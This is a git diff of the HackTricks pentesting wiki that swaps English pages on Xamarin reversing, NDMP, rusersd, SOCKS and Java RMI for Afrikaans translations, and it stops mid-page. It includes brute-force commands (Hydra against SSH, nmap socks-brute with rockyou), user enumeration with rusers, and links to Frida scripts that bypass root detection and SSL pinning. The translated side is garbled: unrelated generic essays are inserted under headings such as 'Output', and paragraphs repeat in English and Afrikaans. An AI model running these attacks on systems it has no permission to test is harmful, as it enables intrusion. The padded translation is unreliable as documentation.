Visual Studio can identify modules for decompilation, allowing for direct access to third-party code and extraction of source code for analysis. +Decompilering omskep saamgestelde kode terug na bronkode. In Windows kan die Modules-venster in Visual Studio modules identifiseer vir decompilering, wat direkte toegang tot derdeparty-kode en die onttrekking van bronkode vir analise moontlik maak. -#### JIT vs AOT Compilation +#### JIT vs AOT Samestelling -- **Android** supports Just-In-Time (JIT) and Ahead-Of-Time (AOT) compilation, with a Hybrid AOT mode for optimal execution speed. Full AOT is exclusive to Enterprise licenses. -- **iOS** solely employs AOT compilation due to Apple's restrictions on dynamic code execution. +- **Android** ondersteun Just-In-Time (JIT) en Ahead-Of-Time (AOT) samestelling, met 'n Hybrid AOT-modus vir optimale uitvoerspoed. Volledige AOT is eksklusief vir Enterprise-lisensies. +- **iOS** gebruik slegs AOT-samestelling as gevolg van Apple se beperkings op dinamiese kode-uitvoering. -### Extracting dll Files from APK/IPA - -To access the assemblies in an APK/IPA, unzip the file and explore the assemblies directory. For Android, tools like [XamAsmUnZ](https://github.com/cihansol/XamAsmUnZ) and [xamarin-decompress](https://github.com/NickstaDB/xamarin-decompress) can uncompress dll files. +### Onttrekking van dll-lêers uit APK/IPA +Om toegang te verkry tot die samestellings in 'n APK/IPA, pak die lêer uit en verken die samestellingsgids. Vir Android kan gereedskap soos [XamAsmUnZ](https://github.com/cihansol/XamAsmUnZ) en [xamarin-decompress](https://github.com/NickstaDB/xamarin-decompress) dll-lêers ontkomprimeer. ```bash python3 xamarin-decompress.py -o /path/to/decompressed/apk ``` - -For assembly blobs in Android, [pyxamstore](https://github.com/jakev/pyxamstore) can unpack them. - +Vir saamgestelde blobs in Android, kan [pyxamstore](https://github.com/jakev/pyxamstore) hulle uitpak. ```bash pyxamstore unpack -d /path/to/decompressed/apk/assemblies/ ``` +iOS dll-lêers is maklik toeganklik vir dekompilering, wat beduidende dele van die toepassingskode onthul, wat dikwels 'n gemeenskaplike basis deel oor verskillende platforms. -iOS dll files are readily accessible for decompilation, revealing significant portions of the application code, which often shares a common base across different platforms. +### Dinamiese Analise -### Dynamic Analysis +Dinamiese analise behels die nagaan van SSL-pinning en die gebruik van hulpmiddels soos [Fridax](https://github.com/NorthwaveSecurity/fridax) vir tydveranderinge van die .NET-binêre lêer in Xamarin-toepassings. Frida-skripte is beskikbaar om wortelopsporing of SSL-pinning te omseil en analise-vermoëns te verbeter. -Dynamic analysis involves checking for SSL pinning and using tools like [Fridax](https://github.com/NorthwaveSecurity/fridax) for runtime modifications of the .NET binary in Xamarin apps. Frida scripts are available to bypass root detection or SSL pinning, enhancing analysis capabilities. - -Other interesting Frida scripts: +Ander interessante Frida-skripte: * [**xamarin-antiroot**](https://codeshare.frida.re/@Gand3lf/xamarin-antiroot/) * [**xamarin-root-detect-bypass**](https://codeshare.frida.re/@nuschpl/xamarin-root-detect-bypass/) * [**Frida-xamarin-unpin**](https://github.com/GoSecure/frida-xamarin-unpin) -## Further information +## Verdere inligting * [https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers](https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers) * [https://thecobraden.com/posts/unpacking\_xamarin\_assembly\_stores/](https://thecobraden.com/posts/unpacking\_xamarin\_assembly\_stores/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/network-services-pentesting/10000-network-data-management-protocol-ndmp.md b/network-services-pentesting/10000-network-data-management-protocol-ndmp.md index 7ffe3d361..bf4ad3f92 100644 --- a/network-services-pentesting/10000-network-data-management-protocol-ndmp.md +++ b/network-services-pentesting/10000-network-data-management-protocol-ndmp.md @@ -1,39 +1,63 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-# **Protocol Information** +# **Protokol Inligting** -From [Wikipedia](https://en.wikipedia.org/wiki/NDMP): +Van [Wikipedia](https://en.wikipedia.org/wiki/NDMP): -> **NDMP**, or **Network Data Management Protocol**, is a protocol meant to transport data between network attached storage \([NAS](https://en.wikipedia.org/wiki/Network-attached_storage)\) devices and [backup](https://en.wikipedia.org/wiki/Backup) devices. This removes the need for transporting the data through the backup server itself, thus enhancing speed and removing load from the backup server. - -**Default port:** 10000 +> **NDMP**, of **Network Data Management Protocol**, is 'n protokol wat bedoel is om data tussen netwerkaangehegte stoorplek \([NAS](https://en.wikipedia.org/wiki/Network-attached_storage)\) toestelle en [backup](https://en.wikipedia.org/wiki/Backup) toestelle te vervoer. Dit verwyder die behoefte om die data deur die rugsteunbediener self te vervoer, wat die spoed verbeter en die las van die rugsteunbediener verwyder. +**Verstekpoort:** 10000 ```text PORT STATE SERVICE REASON VERSION 10000/tcp open ndmp syn-ack Symantec/Veritas Backup Exec ndmp ``` +# **Opsomming** -# **Enumeration** +Enumeration is 'n belangrike fase in die pentesting-proses wat dit moontlik maak om inligting oor 'n teikenstelsel te versamel. Dit behels die identifisering van aktiewe dienste, poorte, gebruikers en ander relevante inligting wat kan help om 'n aanval te beplan. +## **Network Data Management Protocol (NDMP)** + +Die Network Data Management Protocol (NDMP) is 'n protokol wat gebruik word vir die bestuur en beskerming van netwerkdata. Dit maak dit moontlik om data vanaf 'n netwerkstelsel na 'n sekondêre stoorplek te stuur, soos 'n bandeenheid of skyf. + +### **NDMP Enumeration** + +By die uitvoer van 'n NDMP-enumerasie, is dit moontlik om inligting oor die NDMP-diens op 'n teikenstelsel te bekom. Hier is 'n paar tegnieke wat gebruik kan word om NDMP-inligting te versamel: + +1. **Poortskandering**: Deur die skandering van poorte op die teikenstelsel kan jy aktiewe NDMP-poorte identifiseer. Die standaardpoort vir NDMP is 10000. + +2. **Banner Grabbing**: Deur die gebruik van 'n netwerktoetsinstrument soos Telnet of Netcat, kan jy probeer om die NDMP-diens se banierinligting te bekom. Dit kan nuttige inligting verskaf oor die gebruikte NDMP-weergawe en -implementering. + +3. **NDMP-spoor**: Dit behels die ondersoek van die teikenstelsel se loglêers vir enige verwysings na NDMP-aktiwiteite. Dit kan help om inligting oor die gebruikte NDMP-weergawe, konfigurasie en moontlike kwesbaarhede te vind. + +4. **NDMP-bruteforcing**: As jy 'n geldige gebruikersnaam en wagwoord het, kan jy probeer om in te log op die NDMP-diens deur middel van bruteforcing. Dit behels die outomatiese poging om verskillende kombinasies van gebruikersname en wagwoorde te probeer totdat 'n suksesvolle inlogpoging plaasvind. + +### **NDMP Exploitation** + +Nadat jy relevante inligting oor die NDMP-diens op 'n teikenstelsel versamel het, kan jy dit moontlik uitbuit om toegang tot die stelsel te verkry. Hier is 'n paar moontlike uitbuitingstegnieke: + +1. **Kwesbaarheidsuitbuiting**: As jy 'n bekende kwesbaarheid in die gebruikte NDMP-weergawe en -implementering identifiseer, kan jy dit moontlik uitbuit om toegang tot die stelsel te verkry. Dit kan behels om spesifieke aanvalskode te gebruik of 'n bekende uitbuitingsraamwerk te implementeer. + +2. **Misbruik van swak konfigurasie**: As jy 'n swak konfigurasie in die NDMP-diens identifiseer, soos 'n onveilige wagwoordbeleid of onvoldoende toegangsbeheer, kan jy dit moontlik misbruik om toegang tot die stelsel te verkry. + +3. **Man-in-die-middel-aanvalle**: As jy in staat is om die netwerkverkeer tussen die NDMP-diens en die stoorplek te onderskep, kan jy dit moontlik gebruik om gevoelige inligting te onderskep of te manipuleer. + +Dit is belangrik om te onthou dat enige uitbuiting van 'n teikenstelsel slegs uitgevoer moet word met toestemming van die eienaar van die stelsel. ```bash nmap -n -sV --script "ndmp-fs-info or ndmp-version" -p 10000 #Both are default scripts ``` - ## Shodan `ndmp` @@ -42,16 +66,14 @@ nmap -n -sV --script "ndmp-fs-info or ndmp-version" -p 10000 #Both are defa
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
- - diff --git a/network-services-pentesting/1026-pentesting-rusersd.md b/network-services-pentesting/1026-pentesting-rusersd.md index 3ce5ca985..c2e905a5f 100644 --- a/network-services-pentesting/1026-pentesting-rusersd.md +++ b/network-services-pentesting/1026-pentesting-rusersd.md @@ -1,28 +1,25 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-# Basic Information +# Basiese Inligting -This protocol will provide you the usernames of the host. You may be able to find this services listed by the port-mapper service like this: +Hierdie protokol sal jou die gebruikersname van die gasheer gee. Jy kan dalk hierdie dienste vind wat gelys word deur die poort-kaartdiens soos hierdie: ![](<../.gitbook/assets/image (231).png>) -## Enumeration - +## Enumerasie ``` root@kali:~# apt-get install rusers root@kali:~# rusers -l 192.168.10.1 @@ -31,20 +28,16 @@ Sending broadcast for rusersd protocol version 2... tiff potatohead:console Sep 2 13:03 22:03 katykat potatohead:ttyp5 Sep 1 09:35 14 ``` - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/network-services-pentesting/1080-pentesting-socks.md b/network-services-pentesting/1080-pentesting-socks.md index e1ed298e1..5b5d66dae 100644 --- a/network-services-pentesting/1080-pentesting-socks.md +++ b/network-services-pentesting/1080-pentesting-socks.md @@ -2,48 +2,137 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -**SOCKS** is a protocol used for transferring data between a client and server through a proxy. The fifth version, **SOCKS5**, adds an optional authentication feature, allowing only authorized users to access the server. It primarily handles the proxying of TCP connections and the forwarding of UDP packets, operating at the session layer (Layer 5) of the OSI model. +**SOCKS** is 'n protokol wat gebruik word om data tussen 'n klient en bediener deur 'n proksi oor te dra. Die vyfde weergawe, **SOCKS5**, voeg 'n opsionele outentiseringsfunksie by, wat slegs gevolmagtigde gebruikers toelaat om die bediener te benader. Dit hanteer primêr die proksiering van TCP-verbindinge en die deurstuur van UDP-pakette, en werk op die sessielaag (Laag 5) van die OSI-model. -**Default Port:** 1080 +**Verstekpoort:** 1080 -## Enumeration - -### Authentication Check +## Enumerasie +### Outentiseringskontrole ```bash nmap -p 1080 --script socks-auth-info ``` - ### Brute Force -#### Basic usage +#### Basiese gebruik +Brute Force is 'n aanvalstegniek wat gebruik word om toegang te verkry tot 'n stelsel deur alle moontlike kombinasies van gebruikersname en wagwoorde te probeer. Dit kan gebruik word om toegang te verkry tot verskillende netwerkdienste, soos SSH, FTP, Telnet, en ander. + +Die basiese gebruik van Brute Force behels die gebruik van 'n gereedskap soos Hydra of Medusa om 'n lys van gebruikersname en wagwoorde te voer en dit te gebruik om die doelstelsel aan te val. Die gereedskap sal outomaties elke kombinasie probeer totdat dit 'n suksesvolle een vind. + +Hier is 'n voorbeeld van die basiese gebruik van Brute Force met Hydra: + +```plaintext +hydra -l admin -P passwords.txt ssh://192.168.0.1 +``` + +In hierdie voorbeeld gebruik ons Hydra om die SSH-diens op die IP-adres 192.168.0.1 aan te val. Ons gebruik die gebruikersnaam "admin" en 'n lys van wagwoorde wat in die passwords.txt-lêer opgesluit is. + +Dit is belangrik om te onthou dat Brute Force 'n baie tydrowende proses kan wees en dat dit 'n groot hoeveelheid rekenaarhulpbronne kan vereis. Dit is ook 'n onetiese praktyk om Brute Force-aanvalle sonder toestemming uit te voer. ```bash nmap --script socks-brute -p 1080 ``` +#### Gevorderde gebruik -#### Advanced usage +##### Socks Proxy +A Socks proxy is a protocol that allows a client to establish a connection through a firewall by using a proxy server. It can be used to bypass network restrictions and access resources that are otherwise blocked. + +##### Socks Proxy + +'n Socks-proksi is 'n protokol wat 'n kliënt in staat stel om 'n verbinding deur 'n vuurmuur te vestig deur 'n proksi-bediener te gebruik. Dit kan gebruik word om netwerkbeperkings te omseil en hulpbronne te benader wat andersins geblokkeer is. + +##### Socks Proxy Chains + +Socks Proxy Chains is a tool that allows you to create a chain of multiple Socks proxies. This can be useful for hiding your identity and location, as well as for bypassing multiple layers of security. + +##### Socks Proxy-kettinge + +Socks Proxy-kettinge is 'n hulpmiddel wat jou in staat stel om 'n ketting van verskeie Socks-proksies te skep. Dit kan nuttig wees om jou identiteit en ligging te verberg, sowel as om verskeie vlakke van sekuriteit te omseil. + +##### Socks Over SSH + +Socks Over SSH is a technique that allows you to create a secure connection by tunneling the Socks traffic through an SSH connection. This can provide an additional layer of encryption and security. + +##### Socks oor SSH + +Socks oor SSH is 'n tegniek wat jou in staat stel om 'n veilige verbinding te skep deur die Socks-verkeer deur 'n SSH-verbinding te stuur. Dit kan 'n addisionele laag van versleuteling en sekuriteit bied. + +##### Socks Over Tor + +Socks Over Tor is a technique that allows you to route your Socks traffic through the Tor network. This can provide anonymity and help bypass censorship and surveillance. + +##### Socks oor Tor + +Socks oor Tor is 'n tegniek wat jou in staat stel om jou Socks-verkeer deur die Tor-netwerk te roeteer. Dit kan anonimiteit bied en help om sensuur en bewaking te omseil. + +##### Socks Over VPN + +Socks Over VPN is a technique that allows you to route your Socks traffic through a VPN (Virtual Private Network) connection. This can provide an additional layer of privacy and security. + +##### Socks oor VPN + +Socks oor VPN is 'n tegniek wat jou in staat stel om jou Socks-verkeer deur 'n VPN (Virtuele Privaat Netwerk) verbinding te roeteer. Dit kan 'n addisionele laag van privaatheid en sekuriteit bied. ```bash nmap --script socks-brute --script-args userdb=users.txt,passdb=rockyou.txt,unpwdb.timelimit=30m -p 1080 ``` +#### Uitset -#### Output +# Pentesting SOCKS +## Inleiding + +SOCKS (Socket Secure) is 'n protokol wat gebruik word om 'n veilige verbinding tussen 'n klient en 'n bediener te skep. Dit maak gebruik van 'n proxybediener om verkeer tussen die klient en die bediener te roeteer en te beskerm teen aanvalle soos IP-lekkasies en verkeersanalise. + +## SOCKS-bediener + +'n SOCKS-bediener is 'n tussenganger wat funksioneer as 'n proxy tussen die klient en die bediener. Dit ontvang verkeer van die klient en stuur dit deur na die bediener. Die bediener antwoord dan deur die SOCKS-bediener, wat die antwoord terugstuur na die klient. Hierdie proses maak dit moontlik vir die klient om 'n veilige verbinding met die bediener te hê sonder om direk met die bediener te kommunikeer. + +## Pentesting SOCKS + +By die pentesting van 'n SOCKS-bediener, is dit belangrik om die volgende aspekte te oorweeg: + +1. Identifiseer die SOCKS-bediener: Vind die IP-adres en poort van die SOCKS-bediener wat gebruik word deur die toepassing of stelsel wat jy ondersoek. + +2. Skandeer vir oop poorte: Gebruik 'n skanderingstool soos Nmap om te bepaal of die SOCKS-poort oop is en beskikbaar is vir kommunikasie. + +3. Identifiseer die SOCKS-protokolverbinding: Gebruik 'n hulpmiddel soos Wireshark om die verkeer tussen die klient en die bediener te ondersoek en die spesifieke SOCKS-protokolverbinding te identifiseer. + +4. Analiseer die verkeer: Ondersoek die verkeer tussen die klient en die bediener om enige potensiële kwesbaarhede of aanvalle te identifiseer. Kyk vir enige ongewone of verdagte aktiwiteit wat kan dui op 'n moontlike aanval. + +5. Voer aanvalle uit: As jy kwesbaarhede of swak punte in die SOCKS-bediener identifiseer, kan jy spesifieke aanvalle uitvoer om die bediener te misbruik of toegang te verkry tot die stelsel wat dit gebruik. + +## Vermy SOCKS-lekke + +Om SOCKS-lekke te voorkom, kan jy die volgende maatreëls tref: + +1. Verseker dat die SOCKS-bediener korrek gekonfigureer is en slegs toegang verleen aan geagte gebruikers en toepassings. + +2. Monitor die verkeer tussen die klient en die bediener vir enige verdagte aktiwiteit of pogings tot aanvalle. + +3. Verseker dat die bediener opgedateer en gepatch is met die nuutste veiligheidsoplossings om bekende kwesbaarhede te voorkom. + +4. Implementeer 'n sterk wagwoordbeleid vir die SOCKS-bediener om te verseker dat slegs geagte gebruikers toegang het. + +5. Beperk die toegang tot die SOCKS-bediener deur slegs spesifieke IP-adresse of subnette toe te laat. + +## Gevolgtrekking + +Die pentesting van SOCKS-bedieners is 'n belangrike stap in die versekering van die veiligheid en integriteit van netwerkverbindings. Deur die identifisering van kwesbaarhede en die implementering van veiligheidsmaatreëls kan jy die risiko van aanvalle en lekke verminder. ``` PORT STATE SERVICE 1080/tcp open socks @@ -53,41 +142,34 @@ PORT STATE SERVICE | Statistics |_ Performed 1921 guesses in 6 seconds, average tps: 320 ``` +## Tunneling en Port Forwarding -## Tunneling and Port Forwarding - -### Basic proxychains usage - -Setup proxy chains to use socks proxy +### Basiese gebruik van proxychains +Stel proxy chains op om socks proxy te gebruik ``` nano /etc/proxychains4.conf ``` - -Edit the bottom and add your proxy - +Edit die onderkant en voeg jou proxy by ``` socks5 10.10.10.10 1080 ``` - -With auth - +Met outentifikasie ``` socks5 10.10.10.10 1080 username password ``` - -#### More info: [Tunneling and Port Forwarding](../generic-methodologies-and-resources/tunneling-and-port-forwarding.md) +#### Meer inligting: [Tunneling en Port Forwarding](../generic-methodologies-and-resources/tunneling-and-port-forwarding.md)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/network-services-pentesting/1099-pentesting-java-rmi.md b/network-services-pentesting/1099-pentesting-java-rmi.md index de812b674..4dfa34536 100644 --- a/network-services-pentesting/1099-pentesting-java-rmi.md +++ b/network-services-pentesting/1099-pentesting-java-rmi.md @@ -2,32 +2,31 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks 